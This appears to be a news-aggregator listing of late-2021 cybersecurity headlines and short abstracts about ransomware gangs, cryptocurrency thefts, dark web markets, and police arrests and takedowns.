Abstract The Lapsus$ ransomware gang has compromised the infrastructure of Impresa, the largest media conglomerate in Portugal and the owner of SIC and Expresso. Impresa owns...

Security Affairs


January 2, 2022

North Korea-linked threat actors stole $1.7 billion from cryptocurrency exchanges Full Text

Abstract North Korea-linked APT groups are suspected to be behind some of the largest cyberattacks against cryptocurrency exchanges. According to South...

Security Affairs


December 30, 2021

AvosLocker ransomware gang releases a free decryptor after an affiliate hit US gov agency Full Text

Abstract The AvosLocker ransomware operators released a free decryptor after an affiliate accidentally encrypted the systems of a US government entity. https://twitter.com/pancak3lullz/status/1476217440442925057 According...

Security Affairs


December 29, 2021

Ransomware gang coughs up decryptor after realizing they hit the police Full Text

Abstract The AvosLocker ransomware operation provided a free decryptor after learning they encrypted a US government agency.

BleepingComputer


December 27, 2021

Dark web marketplace ToRReZ shuts down of its own accord Full Text

Abstract The operators of the ToRReZ dark web marketplace shut down their operation before Christmas, claiming that the closure is the result...

Security Affairs


December 22, 2021

PYSA ransomware gang is the most active group in November Full Text

Abstract PYSA and LockBit were the most active ransomware gangs in the threat landscape in November 2021, researchers from NCC Group report. NCC Group recorded an increase in ransomware attacks in November 2021 compared with October,...

Security Affairs


December 21, 2021

Russian national extradited to US for trading on stolen Information Full Text

Abstract Russian national Vladislav Klyushin (41) was extradited to the United States from Switzerland to face charges of trading on information stolen from hacked U.S. companies...

Security Affairs


December 21, 2021

2easy now a significant dark web marketplace for stolen data Full Text

Abstract A dark web marketplace named '2easy' is becoming a significant player in the sale of stolen data "logs" harvested from roughly 600,000 devices infected with information-stealing malware.

BleepingComputer


December 21, 2021

Russian hackers made millions by stealing SEC earning reports Full Text

Abstract A Russian national working for a cybersecurity company has been extradited to the U.S., where he is being charged with hacking into the computer networks of two U.S.-based filing agents used by multiple companies to file quarterly and annual earnings through the Securities and Exchange Commission's (SEC) system.

BleepingComputer


December 20, 2021

Conti Ransomware Gang Has Full Log4Shell Attack Chain Full Text

Abstract Conti has become the first professional-grade, sophisticated ransomware group to weaponize Log4Shell (the Log4j 2 vulnerability), now with a full attack chain.

Threatpost


December 20, 2021

Hackers Steal Over 1.8 Million People’s Credit Card Data from Sports Gear Websites Full Text

Abstract The affected sports gear websites discovered on Oct 15 that they had been compromised, and on Nov 29 they notified customers of a data breach in which the hackers stole payment card data for more than 1.8 million customers.

GB Hackers


December 19, 2021

Clop ransomware gang is leaking confidential data from the UK police Full Text

Abstract The Clop ransomware gang stole confidential data held by some British police and leaked it on the dark web after the victim refused to pay the ransom, according to the media...

Security Affairs


December 17, 2021

Conti Gang Suspected of Ransomware Attack on McMenamins Full Text

Abstract The incident occurred last weekend at the popular chain of restaurants, hotels and breweries, which is still facing disruptions.

Threatpost


December 17, 2021

Conti ransomware gang exploits Log4Shell bug in its operations Full Text

Abstract The Conti ransomware gang is the first ransomware operation to exploit the Log4Shell vulnerability to target VMware vCenter servers, making it the first professional ransomware group to use the Log4Shell exploit to compromise VMware vCenter...

Security Affairs


December 16, 2021

How expired web domains help criminal hackers unlock enterprise defenses Full Text

Abstract Organizations allow domains to expire for a number of reasons. Sometimes it’s a simple mistake: a domain renewal is overlooked because a payment method has expired or the renewal contact has moved on.

The Daily Swig


December 15, 2021

FBI’s investigation accidentally revealed the HelloKitty ransomware gang operates out of Ukraine Full Text

Abstract While investigating a data breach suffered by an Oregon healthcare organization, the FBI accidentally revealed that it believes the HelloKitty ransomware gang operates out of Ukraine...

Security Affairs


December 15, 2021

Hackers Steal $140 Million from Users of Crypto Gaming Company Full Text

Abstract The hackers stole the private keys to 96 wallets, siphoning off 4.5 million PYR, the Vulcan Forged token that can be used across its ecosystem, the company said in a series of tweets.

Vice


December 14, 2021

Forget the dark web: ransomware gangs weaponize social media to pressure victims Full Text

Abstract In an effort to amplify coverage, some ransomware groups are using social media channels to bring news of their conquests to a wider audience and put more pressure on victims to pay the ransom.

Emsisoft


December 13, 2021

Ransomware Affiliate Arrested in Romania; 51 Stolen Data Brokers Arrested in Ukraine Full Text

Abstract Europol, the European Union's premier law enforcement agency, has announced the arrest of a third Romanian national for his role as a ransomware affiliate suspected of hacking high-profile organizations and companies and stealing large volumes of sensitive data. The 41-year-old unnamed individual was apprehended Monday morning at his home in Craiova, Romania, by the Romanian Directorate for Investigating Organized Crime and Terrorism (DIICOT) following a joint investigation in collaboration with the U.S. Federal Bureau of Investigation (FBI). It's not currently known which ransomware gang the suspect was working with, but the development comes a little over a month after Romanian authorities arrested two affiliates of the REvil ransomware family, who are believed to have orchestrated no fewer than 5,000 ransomware attacks and extorted close to $600,000 from victims. Affiliates play a key role in ransomware-as-a-service (RaaS) subscription-based business models, and a

The Hacker News


December 13, 2021

Romanian ransomware suspect arrested in joint Europol, FBI operation Full Text

Abstract A Romanian man accused of using ransomware to hack high-profile organizations and companies was arrested Monday as part of a joint operation between the Romanian National Police, the FBI, and Europol.

Cyberscoop


December 13, 2021

Ukraine arrests 51 for selling data of 300 million people in US, EU Full Text

Abstract Ukrainian law enforcement arrested 51 suspects believed to have been selling stolen personal data on hacking forums belonging to hundreds of millions worldwide, including Ukraine, the US, and Europe.

BleepingComputer


December 13, 2021

Police arrests ransomware affiliate behind high-profile attacks Full Text

Abstract Romanian law enforcement authorities arrested a ransomware affiliate suspected of hacking and stealing sensitive info from the networks of multiple high-profile companies worldwide, including a large Romanian IT company with clients from the retail, energy, and utilities sectors.

BleepingComputer


December 11, 2021

New ‘Karakurt’ cybercrime gang focuses on data theft and extortion Full Text

Abstract Accenture researchers detailed the activity of Karakurt, a new, sophisticated, financially motivated cybercrime group behind recent cyberattacks. The activity...

Security Affairs


December 9, 2021

Canadian Ransomware Arrest Is a Meaningful Flex, Experts Say Full Text

Abstract U.S. and Canada charge Ottawa man for ransomware attacks, signaling that North America is no cybercriminal haven.

Threatpost


December 8, 2021

Canadian indicted for launching ransomware attacks on orgs in US, Canada Full Text

Abstract The FBI and Justice Department unsealed indictments today leveling a number of charges against 31-year-old Canadian Matthew Philbert for his alleged involvement in several ransomware attacks.

ZDNet


December 07, 2021

Alleged ransomware affiliate arrested for healthcare attacks Full Text

Abstract A 31-year old Canadian national has been charged in connection to ransomware attacks against organizations in the United States and Canada, a federal indictment unsealed today shows.

BleepingComputer


December 6, 2021

Cuba Ransomware Gang Hauls in $44M in Payouts Full Text

Abstract The gang is using a variety of tools and malware to carry out attacks in volume on critical sectors, the FBI warned.

Threatpost


December 06, 2021

Hackers Steal $200 Million Worth of Cryptocurrency Tokens from BitMart Exchange Full Text

Abstract Cryptocurrency trading platform BitMart has disclosed a "large-scale security breach" that it blamed on a stolen private key, resulting in the theft of more than $150 million in various cryptocurrencies. The breach is said to have impacted two of its hot wallets on the Ethereum (ETH) blockchain and the Binance Smart Chain (BSC). The company noted that the wallets carried only a "small percentage" of its assets. Hot wallets, as opposed to their cold counterparts, are connected to the internet and allow cryptocurrency owners to receive and send tokens. Blockchain security and data analytics company PeckShield estimated the total loss to be around $200 million, calling the whole chain of events "Pretty straightforward: transfer-out, swap, and wash." "This security breach was mainly caused by a stolen private key that had two of our hot wallets compromised," BitMart's chief executive Sheldon Xia said in a series of tweets sent

The Hacker News


December 4, 2021

Cuba ransomware gang hacked 49 US critical infrastructure organizations Full Text

Abstract A flash alert published by the FBI has revealed that the Cuba ransomware gang breached the networks of at least 49 US critical infrastructure organizations...

Security Affairs


December 3, 2021

Hackers Steal $120 Million from Badger DeFi Platform Full Text

Abstract Hackers have stolen an estimated $120 million worth of Bitcoin and Ether assets from Badger, a decentralized finance (DeFi) platform that allows users to borrow, loan, and speculate on cryptocurrency price variations.

The Record


December 3, 2021

Threat actors stole $120 M in crypto from BadgerDAO DeFi platform Full Text

Abstract Threat actors this week hacked the decentralized finance platform BadgerDAO and stole $120.3 million in cryptocurrencies from multiple wallets connected to the platform...

Security Affairs


December 2, 2021

Europol arrested 1800 money mules as part of an anti-money-laundering operation Full Text

Abstract Europol identified 18,351 money mules and arrested 1,803 of them as part of an international anti-money-laundering operation codenamed EMMA 7...

Security Affairs


December 1, 2021

Stealthy ‘WIRTE’ Gang Targets Middle Eastern Governments Full Text

Abstract Kaspersky researchers suspect that the cyberattackers may be a subgroup of the politically motivated, Palestine-focused Gaza Cybergang.

Threatpost


December 01, 2021

Bulletproof hosting founder imprisoned for helping cybercrime gangs Full Text

Abstract 34-year-old Russian Aleksandr Grichishkin, the founder of a bulletproof hosting service, was sentenced to 60 months in prison for allowing cybercrime gangs to use the platform in attacks targeting US financial institutions between 2008 and 2015.

BleepingComputer


December 1, 2021

European Money Mule Action leads to 1,803 arrests Full Text

Abstract This was the seventh iteration of the European Money Mule Action, or ‘EMMA’, which was established in 2016 on the initiative of Europol, Eurojust, and the European Banking Federation.

Europol


December 1, 2021

Ottawa’s French public school board paid hackers a ransom following cyberattack Full Text

Abstract Hackers had stolen approximately 75 GB worth of data about employees and some students and parents dating back to 2000 that was stored on a server at the board's main office.

CTV News


November 30, 2021

FBI seized $2.3M from affiliate of REvil, Gandcrab ransomware gangs Full Text

Abstract The FBI seized $2.2 million in August from a well-known REvil and GandCrab ransomware affiliate, according to court documents seen by BleepingComputer.

BleepingComputer


November 30, 2021

FBI seized $2.2M from affiliate of REvil, Gandcrab ransomware gangs Full Text

Abstract The FBI seized $2.2 million in August from a well-known REvil and GandCrab ransomware affiliate, according to court documents seen by BleepingComputer.

BleepingComputer


November 30, 2021

Cybercriminals Pose as Samsung Recruiters to Target South Korea Full Text

Abstract A report by Google revealed that Lazarus APT, the North Korea-linked cyberespionage group, impersonated Samsung recruiters to target South Korean security firms selling anti-malware solutions. The emails contained a malicious PDF posing as a recruitment document. Hackers are innovating and putting m ...

Cyware Alerts - Hacker News


November 29, 2021

Ransomware Operators Threaten to Leak 1.5TB of Supernus Pharmaceuticals Data Full Text

Abstract Biopharmaceutical company Supernus Pharmaceuticals last week confirmed it fell victim to a ransomware attack that resulted in a large amount of data being exfiltrated from its network.

Security Week


November 28, 2021

Interpol Arrests Over 1,000 Cyber Criminals From 20 Countries; Seizes $27 Million Full Text

Abstract A joint four-month operation coordinated by Interpol, the international criminal police organization, has culminated in the arrests of more than 1,000 cybercriminals and the recovery of $27 million in illicit proceeds. Codenamed "HAECHI-II," the crackdown enabled law enforcement units from across 20 countries, as well as Hong Kong and Macao, to close 1,660 cases and block 2,350 bank accounts linked to the illicit funds amassed from a range of online financial crimes, such as romance scams, investment fraud, and money laundering associated with illegal online gambling. "The results of Operation HAECHI-II show that the surge in online financial crime generated by the COVID-19 pandemic shows no signs of waning," said Interpol Secretary General Jürgen Stock in a press statement issued on November 26. The coordinated law enforcement probe took place over a period of four months, starting from June 2021 until September 2021, with ten new criminal

The Hacker News


November 27, 2021

HAECHI-II: Interpol arrested 1,000+ suspects linked to various cybercrimes Full Text

Abstract Interpol has coordinated an international operation, code-named HAECHI-II, that led to the arrest of 1,003 individuals charged with several cybercrimes, including romance scams, investment frauds, and online money laundering...

Security Affairs


November 26, 2021

Interpol arrests over 1,000 suspects linked to cyber crime Full Text

Abstract Interpol has coordinated the arrest of 1,003 individuals linked to various cyber-crimes such as romance scams, investment frauds, online money laundering, and illegal online gambling.

BleepingComputer


November 25, 2021

How cybercriminals adjusted their scams for Black Friday 2021 Full Text

Abstract Black Friday is approaching, and while shoppers prepare to open their wallets, cybercriminals hone their malware droppers, phishing lures, and fake sites.

BleepingComputer


November 24, 2021

Suspect arrested in ‘ransom your employer’ criminal scheme Full Text

Abstract The scheme's emails offered recipients a 40% cut of an anticipated $2.5 million ransomware payment in Bitcoin (BTC), to be paid after they installed the DemonWare ransomware on their employer's systems.

ZDNet


November 21, 2021

Researchers were able to access the payment portal of the Conti gang Full Text

Abstract The Conti ransomware group has suffered a data breach that exposed its attack infrastructure and allowed researchers to access it. Researchers at security firm Prodaft were able to identify the real IP address of one of the servers used by the Conti...

Security Affairs


November 20, 2021

The newer cybercrime triad: TrickBot-Emotet-Conti Full Text

Abstract Advanced Intelligence researchers argue that the restarting of the Emotet botnet was driven by Conti ransomware gang. Early this year, law enforcement and judicial authorities worldwide conducted a joint operation, named Operation Ladybird, which...

Security Affairs


November 20, 2021

Cybercriminals discuss new business model for zero-day exploits Full Text

Abstract The potential new service is a product of the highly profitable zero-day market, where researchers have seen multimillion-dollar price tags for vulnerabilities and exploits.

Tech Target


November 19, 2021

Canadian teenager stole $36 Million in cryptocurrency via SIM Swapping Full Text

Abstract A Canadian teen has been arrested for his alleged role in the theft of roughly $36.5 million worth of cryptocurrency. A Canadian teenager has been arrested for his alleged role in the theft of roughly $36.5 million worth of cryptocurrency from an American...

Security Affairs


November 19, 2021

Conti ransomware operations made at least $25.5 million since July 2021 Full Text

Abstract Researchers revealed that Conti ransomware operators earned at least $25.5 million from ransom payments since July 2021. A study conducted by Swiss security firm Prodaft with the support of blockchain analysis firm Elliptic revealed that the operators...

Security Affairs


November 18, 2021

Experts Expose Secrets of Conti Ransomware Group That Made 25 Million from Victims Full Text

Abstract The clearnet and dark web payment portals operated by the Conti ransomware group have gone down in what appears to be an attempt to shift to new infrastructure after details about the gang's inner workings and its members were made public. According to MalwareHunterTeam, "while both the clearweb and Tor domains of the leak site of the Conti ransomware gang is online and working, both their clearweb and Tor domains for the payment site (which is obviously more important than the leak) is down." It's not clear what prompted the shutdown, but the development comes as Swiss cybersecurity firm PRODAFT offered an unprecedented look into the group's ransomware-as-a-service (RaaS) model, wherein the developers sell or lease their ransomware technology to affiliates hired from darknet forums, who then carry out attacks on their behalf while also netting about 70% of each ransom payment extorted from the victims. The result? Three members of the Conti team have b

The Hacker News


November 17, 2021

Most SS7 exploit service providers on dark web are scammers Full Text

Abstract The existence of Signaling System 7 (SS7) mobile telephony protocol vulnerabilities is something security researchers warned about in 2016, and it only took a year before the first attacks exploiting them were observed.

BleepingComputer


November 17, 2021

Russian ransomware gangs start collaborating with Chinese hackers Full Text

Abstract There's some unusual activity brewing on Russian-speaking cybercrime forums, where hackers appear to be reaching out to Chinese counterparts for collaboration.

BleepingComputer


November 17, 2021

The rise of millionaire zero-day exploit markets Full Text

Abstract Researchers detailed the multi-millionaire market of zero-day exploits, a parallel economy that is fueling the threat landscape. Zero-day exploits are essential weapons in the arsenal of nation-state actors and cybercrime groups. The increased demand...

Security Affairs


November 17, 2021

Mandiant links Ghostwriter operations to Belarus Full Text

Abstract Security researchers at the Mandiant Threat Intelligence team believe that Ghostwriter APT group is linked to the government of Belarus. Mandiant Threat Intelligence researchers believe that the Ghostwriter disinformation campaign (aka UNC1151) was linked...

Security Affairs


November 16, 2021

FBI Email Hoaxer ID’ed by the Guy He Allegedly Loves to Torment Full Text

Abstract Vinny Troia, the cybersecurity researcher mentioned in a fake alert gushed out of the FBI’s email system, says it’s just one of a string of jabs from a childish but cybercriminally talented tormentor.

Threatpost


November 16, 2021

REvil Is Down—For Now Full Text

Abstract What can be learned from the operations that got them to shut down?

Lawfare


November 16, 2021

Group behind cyberattacks on multiple governments linked to Belarus Full Text

Abstract Hacking and disinformation groups believed to be behind attacks on governmental agencies in countries including Germany in recent months were linked by cybersecurity researchers on Tuesday to the Belarusian government.

The Hill


November 15, 2021

Magniber is Now Exploiting Internet Explorer Flaws Full Text

Abstract The Magniber ransomware group has updated its attack method and has been exploiting two Internet Explorer (IE) vulnerabilities. Moreover, the group is employing malicious ads to infect users and encrypt devices.

Cyware Alerts - Hacker News


November 15, 2021

Ransomware experts question massive Pysa/Mespinoza victim dump Full Text

Abstract The Pysa ransomware group dumped dozens of victims onto their leak site this week right after US law enforcement officials announced a range of actions taken against ransomware groups.

ZDNet


November 12, 2021

Threat from Organized Cybercrime Syndicates Is Rising Full Text

Abstract Europol reports that criminal groups are undermining the EU’s economy and its society, offering everything from murder-for-hire to kidnapping, torture and mutilation.

Threatpost


November 12, 2021

Trickbot and TA551 Are Buddies Full Text

Abstract A connection was established between the TrickBot gang and the TA551 threat group as a major similarity was found in their tools and TTPs. They use BazarBackdoor and deploy the Cobalt Strike beacon on the compromised system and add scheduled tasks for persistence. The recent collaborations prove h ...

Cyware Alerts - Hacker News


November 11, 2021

Magniber ransomware gang now exploits Internet Explorer flaws in attacks Full Text

Abstract The Magniber ransomware gang is now using two Internet Explorer vulnerabilities and malicious advertisements to infect users and encrypt their devices.

BleepingComputer


November 10, 2021

TrickBot Gang Partners with TA551 Group to Deliver Conti Ransomware Full Text

Abstract The ITG23 group is partnering with TA551 (Shatak) threat group to distribute ITG23’s TrickBot and BazarBackdoor malware, which malicious actors use to deploy Conti ransomware on compromised systems.

Security Boulevard


November 9, 2021

International law enforcement arrested REvil ransomware affiliates in Romania and Kuwait Full Text

Abstract Romanian police arrested two alleged Sodinokibi/REvil ransomware affiliates accused of having orchestrated attacks against thousands of victims. Romanian law enforcement agencies have arrested two alleged Sodinokibi/REvil ransomware affiliates on November...

Security Affairs


November 9, 2021

US DoS offers a reward of up to $10M for leaders of REvil ransomware gang Full Text

Abstract The U.S. government offers up to $10 million for identifying or locating leaders in the REvil/Sodinokibi ransomware operation. The Department of State offers up to $10 million for information that can lead to the identification or location of individuals...

Security Affairs


November 09, 2021

Clop gang exploiting SolarWinds Serv-U flaw in ransomware attacks Full Text

Abstract The Clop ransomware gang, also tracked as TA505 and FIN11, is exploiting a SolarWinds Serv-U vulnerability to breach corporate networks and ultimately encrypt their devices.

BleepingComputer


November 08, 2021

Suspected REvil Ransomware Affiliates Arrested in Global Takedown Full Text

Abstract Romanian law enforcement authorities have announced the arrest of two individuals for their roles as affiliates of the REvil ransomware family, dealing a severe blow to one of the most prolific cybercrime gangs in history. The suspects are believed to have orchestrated more than 5,000 ransomware attacks and extorted close to $600,000 from victims, according to Europol. The arrests, which happened on November 4, are part of a coordinated operation called GoldDust, which has resulted in the arrest of three other REvil affiliates and two suspects connected to GandCrab in Kuwait and South Korea since February 2021. This also includes a 22-year-old Ukrainian national, Yaroslav Vasinskyi, who was arrested in early October and has been accused of perpetrating the devastating attack on Florida-based software firm Kaseya in July 2021, affecting up to 1,500 downstream businesses. In all, the seven suspects linked to the two ransomware families are said to have targeted about 7,000 vic

The Hacker News


November 8, 2021

REvil Affiliates Arrested; DOJ Seizes $6.1M in Ransom Full Text

Abstract The U.S. is seeking the extradition of a Ukrainian man, Yaroslav Vasinskyi, whom they suspect is behind the Kaseya supply-chain attacks and other REvil attacks.

Threatpost


November 08, 2021

U.S. offers $10 million reward for leaders of REvil ransomware Full Text

Abstract The U.S. is offering up to $10 million for identifying or locating leaders in the REvil (Sodinokibi) ransomware operation, including $5 million leading to the arrest of affiliates.

BleepingComputer


November 8, 2021

Operation Cyclone targets Clop Ransomware affiliates Full Text

Abstract Operation Cyclone - Six alleged affiliates of the Clop ransomware operation were arrested in an international joint law enforcement operation led by Interpol. Interpol announced the arrest of six alleged affiliates of the Clop ransomware operation...

Security Affairs


November 08, 2021

US seizes $6 million from REvil ransomware, arrest Kaseya hacker Full Text

Abstract The United States Department of Justice today announced charges against a REvil ransomware affiliate responsible for the attack against the Kaseya MSP platform on July 2nd, and the seizure of more than $6 million from another REvil partner.

BleepingComputer


November 8, 2021

BlackMatter is Shutting Down - Is This Really Happening? Full Text

Abstract BlackMatter has gained a huge amount of notoriety in a short span of time but its time in the underworld has apparently come to an end, or so its operators say.

Cyware Alerts - Hacker News


November 08, 2021

Criminal group dismantled after forcing victims to be money mules Full Text

Abstract The Spanish police have arrested 45 people who are believed to be members of an online fraud group that operated twenty websites to defraud at least 200 people of 1,500,000 Euros ($1.73 million).

BleepingComputer


November 08, 2021

REvil ransomware affiliates arrested in Romania and Kuwait Full Text

Abstract Romanian law enforcement authorities have arrested two suspects believed to be Sodinokibi/REvil ransomware affiliates, allegedly responsible for infecting thousands of victims.

BleepingComputer


November 07, 2021

Operation Cyclone deals blow to Clop ransomware operation Full Text

Abstract A thirty-month international law enforcement operation codenamed 'Operation Cyclone' targeted the Clop ransomware gang, leading to the previously reported arrests of six members in Ukraine.

BleepingComputer


November 05, 2021

U.S. Offers $10 Million Reward for Information on DarkSide Ransomware Group Full Text

Abstract The U.S. government on Thursday announced a $10 million reward for information that may lead to the identification or location of key individuals who hold leadership positions in the DarkSide ransomware group or any of its rebrands. On top of that, the State Department is offering bounties of up to $5 million for intel and tip-offs that could result in the arrest and/or conviction in any country of individuals who are conspiring or attempting to participate in intrusions affiliated with the transnational organized crime syndicate. "In offering this reward, the United States demonstrates its commitment to protecting ransomware victims around the world from exploitation by cyber criminals," the State Department said in a statement. "The United States looks to nations who harbor ransomware criminals that are willing to bring justice for those victim businesses and organizations affected by ransomware." The development comes in response to DarkSide's high-pr

The Hacker News


November 04, 2021

Top DOJ official predicting more arrests in crackdown on ransomware, cyber crime Full Text

Abstract Deputy Attorney General Lisa Monaco said the U.S. should expect to see a crackdown on ransomware attacks and cyber crime as the Department of Justice (DOJ) ramps up its efforts in the area.

The Hill


November 04, 2021

Lockean multi-ransomware affiliates linked to attacks on French orgs Full Text

Abstract Details about the tools and tactics used by a ransomware affiliate group, now tracked as Lockean, have emerged today in a report from France's Computer Emergency Response Team (CERT).

BleepingComputer


November 3, 2021

Report: BlackMatter Ransomware Gang Goes Dark, Again Full Text

Abstract The former DarkSide cybercriminal group will shut down due to increased pressure from authorities, who may have nabbed a key team member.

Threatpost


November 3, 2021

Cybercrime underground flooded with offers for initial access to shipping and logistics orgs Full Text

Abstract Experts warn of the availability in the cybercrime underground of offers for initial access to networks of players in global supply chains. Researchers from threat intelligence firm Intel 471 published an analysis of current cybercrime underground...

Security Affairs


November 3, 2021

BlackMatter ransomware gang is shutting down due to pressure from law enforcement Full Text

Abstract The BlackMatter ransomware gang announced it is going to shut down its operation due to pressure from law enforcement. The BlackMatter ransomware group has announced it is shutting down its operation due to the pressure from local authorities. The...

Security Affairs


November 2, 2021

Ransomware Gangs Target Corporate Financial Activities Full Text

Abstract The FBI is warning about a fresh extortion tactic: threatening to tank share prices for publicly held companies.

Threatpost


November 2, 2021

Ransomware gangs target companies involved in time-sensitive financial events, FBI warns Full Text

Abstract The FBI warns of ransomware attacks on businesses involved in "time-sensitive financial events" such as corporate mergers and acquisitions. The Federal Bureau of Investigation (FBI) published a new private industry notification (PIN) to warn organizations...

Security Affairs


October 31, 2021

TA575 is Using Squid Game Lures to Drop Dridex Full Text

Abstract Proofpoint stumbled across a cybercrime actor, TA575, sending thousands of Squid Game phishing lures aimed at multiple industries primarily in the U.S. The group sends thousands of emails in every single campaign aimed at hundreds of organizations. Users are advised not to believe anything on the ...

Cyware Alerts - Hacker News


October 29, 2021

Police arrest hackers behind over 1,800 ransomware attacks Full Text

Abstract The Europol has announced the arrest of 12 individuals who are believed to be linked to ransomware attacks against 1,800 victims in 71 countries.

BleepingComputer


October 29, 2021

Russian TrickBot Gang Hacker Extradited to U.S. Charged with Cybercrime Full Text

Abstract A Russian national, who was arrested in South Korea last month and extradited to the U.S. on October 20, appeared in a federal court in the state of Ohio on Thursday to face charges for his alleged role as a member of the infamous TrickBot group. Court documents showed that Vladimir Dunaev, 28, along with other members of the transnational, cybercriminal organization, stole money and confidential information from unsuspecting victims, including individuals, financial institutions, school districts, utility companies, government entities, and private businesses. Starting its roots as a banking trojan in 2016, TrickBot has evolved into a modular, multi-stage Windows-based crimeware solution capable of pilfering valuable personal and financial information, and even dropping ransomware and post-exploitation toolkits on compromised devices. The malware is also notorious for its resilience, having survived at least two takedowns spearheaded by Microsoft and the U.S. Cyber Command

The Hacker News


October 28, 2021

Ransomware gangs use SEO poisoning to infect visitors Full Text

Abstract Researchers have spotted two campaigns linked to either the REvil ransomware gang or the SolarMarker backdoor that use SEO poisoning to serve payloads to targets.

BleepingComputer


October 28, 2021

German investigators identify REvil ransomware gang core member Full Text

Abstract German investigators have reportedly identified a Russian man named Nikolay K. whom they believe to be one of REvil ransomware gang's core members, one of the most notorious and successful ransomware groups in recent years.

BleepingComputer


October 27, 2021

NRA: No comment on Russian ransomware gang attack claims Full Text

Abstract The Grief ransomware gang claims to have attacked the National Rifle Association (NRA) and released allegedly stolen data as proof of the attack.

BleepingComputer


October 27, 2021

Grief ransomware gang hit US National Rifle Association (NRA) Full Text

Abstract Grief ransomware operators claim to have compromised computer systems at the US National Rifle Association (NRA) and added it to their leak site. Grief ransomware operators announced that they had hacked the US National Rifle Association (NRA) and threaten to leak...

Security Affairs


October 27, 2021

Hackers arrested for ‘infiltrating’ Ukraine’s health database Full Text

Abstract The Security Service of Ukraine (SSU) has arrested a team of actors who illegally infiltrated the information system of the National Health Service of Ukraine (NHSU) and entered false vaccination entries for other people.

BleepingComputer


October 26, 2021

Dark HunTOR: Police arrested 150 people in dark web drug bust Full Text

Abstract Dark HunTOR: Police corps across the world have arrested 150 individuals suspected of buying or selling illicit goods on the dark web marketplace DarkMarket. A joint international operation, tracked as Dark HunTOR, conducted by law enforcement across...

Security Affairs


October 26, 2021

Police arrest 150 dark web vendors of illegal drugs and guns Full Text

Abstract Law enforcement authorities arrested 150 suspects allegedly involved in selling and buying illicit goods on DarkMarket, the largest illegal marketplace on the dark web when it was taken down in January 2021.

BleepingComputer


October 26, 2021

Money launderers for Russian hacking groups arrested in Ukraine Full Text

Abstract The Ukrainian cybercrime police force has arrested members of a group of money launderers and hackers at the request of U.S. intelligence services. 

BleepingComputer


October 25, 2021

Unknown ransomware gang uses SQL injection bug in BillQuick Web Suite to deploy ransomware Full Text

Abstract An unknown ransomware gang leverages a critical SQL injection flaw in the BillQuick Web Suite time and billing solution to deploy ransomware. An unknown ransomware gang is exploiting a critical SQL injection flaw, tracked as CVE-2021-42258, in the popular...

Security Affairs


October 25, 2021

Microsoft: Russian SVR hacked at least 14 IT supply chain firms since May Full Text

Abstract Microsoft says the Russian-backed Nobelium threat group behind last year's SolarWinds hack is still targeting the global IT supply chain, with 140 resellers and technology service providers attacked and at least 14 breached since May 2021.

BleepingComputer


October 25, 2021

Threat Actors Sell 50 Million Records of Moscow Drivers on Hacking Forum Full Text

Abstract Threat actors are selling a database containing 50 million records of Moscow drivers on an underground forum for only $800. The data contains records collected between 2006 and 2019.

Security Affairs


October 24, 2021

Ransomware Gangs Earned $590 Million in H1 2021 Full Text

Abstract Almost $5.2 billion worth of outgoing Bitcoin transactions have been observed by FinCEN. This amount is possibly linked to the top 10 most reported ransomware strains. 

Cyware Alerts - Hacker News


October 24, 2021

Threat actors offer for sale data for 50 millions of Moscow drivers Full Text

Abstract Threat actors are offering for sale a database containing 50 million records belonging to Moscow drivers on a hacking forum for $800. Bad news for Russian drivers, threat actors are selling a database containing 50 million records belonging to Moscow...

Security Affairs


October 23, 2021

Hacker sells the data for millions of Moscow drivers for $800 Full Text

Abstract Hackers are selling a stolen database containing 50 million records of Moscow driver data on an underground forum for only $800.

BleepingComputer


October 23, 2021

Ransomware hackers nervous, allege harassment from U.S. Full Text

Abstract Several ransomware gangs posted lengthy anti-U.S. screeds. They appear prompted by the news that the FBI had successfully hacked and taken down another major ransomware group called REvil.

NBC News


October 23, 2021

Feds Reportedly Hacked REvil Ransomware Group and Forced it Offline Full Text

Abstract The Russian-led REvil ransomware gang was felled by an active multi-country law enforcement operation that resulted in its infrastructure being hacked and taken offline for a second time earlier this week, in what's the latest action taken by governments to disrupt the lucrative ecosystem. The takedown was first reported by Reuters, quoting multiple private-sector cyber experts working with the U.S. government, noting that the May cyber attack on Colonial Pipeline relied on encryption software developed by REvil associates, officially corroborating DarkSide's connections to the prolific criminal outfit. Coinciding with the development, blockchain analytics firm Elliptic disclosed that $7 million in bitcoin held by the DarkSide ransomware group were moved through a series of new wallets, with a small fraction of the amount being transferred with each transfer to make the laundered money more difficult to track and convert the funds into fiat currency through

The Hacker News


October 23, 2021

After Nation-State Hackers, Cybercriminals Also Add Sliver Pentest Tool to Arsenal Full Text

Abstract The cybercriminal group tracked as TA551 recently showed a significant change in tactics with the addition of the open-source pentest tool Sliver to its arsenal, according to cybersecurity firm Proofpoint.

Security Week


October 22, 2021

Groove ransomware group calls on other ransomware gangs to hit US public sector Full Text

Abstract Groove ransomware operators call on other ransomware groups to stop competing and join forces to fight against the US. The Groove ransomware gang is calling on other ransomware groups to attack the US public sector after a law enforcement operation...

Security Affairs


October 22, 2021

DarkSide ransomware operators move 6.8M worth of Bitcoin after REvil shutdown Full Text

Abstract Darkside and BlackMatter ransomware operators have moved a large amount of their Bitcoin reserves after the recent shutdown of REvil's infrastructure. The gangs behind the Darkside and BlackMatter ransomware operations have moved 107 BTC ($6.8 million)...

Security Affairs


October 22, 2021

Groove ransomware calls on all extortion gangs to attack US interests Full Text

Abstract The Groove ransomware gang is calling on other extortion groups to attack US interests after law enforcement took down REvil's infrastructure last week.

BleepingComputer


October 22, 2021

FIN7 cybercrime gang creates fake cybersecurity firm to recruit pentesters for ransomware attacks Full Text

Abstract The FIN7 hacking group created fake cybersecurity companies to hire experts and involve them in ransomware attacks, tricking them into believing they are conducting a pentest. The FIN7 hacking group is attempting to enter the ransomware business and is doing it with an interesting...

Security Affairs


October 22, 2021

DarkSide Ransomware Gang Moves Bitcoin Reserves After REvil Got Hit by Law Enforcement Action Full Text

Abstract The operators of the Darkside and BlackMatter ransomware strains have moved a large chunk of their Bitcoin reserves after news broke that REvil was hit by a law enforcement takedown.

The Record


October 21, 2021

Cybercriminals Exploit the Discord CDN to Deliver 27 Unique Types of Malware Full Text

Abstract Discord, a popular VoIP, instant messaging, and digital distribution platform used by 140 million people in 2021, is being abused by cybercriminals to deploy malware files.

Risk IQ


October 21, 2021

US, allied nations force REvil ransomware group offline: report Full Text

Abstract The United States and other nations earlier this week in a joint operation hacked and forced offline the REvil cyber criminal group, which has been linked to several major ransomware attacks this year.

The Hill


October 21, 2021

Hacking gang creates fake firm to hire pentesters for ransomware attacks Full Text

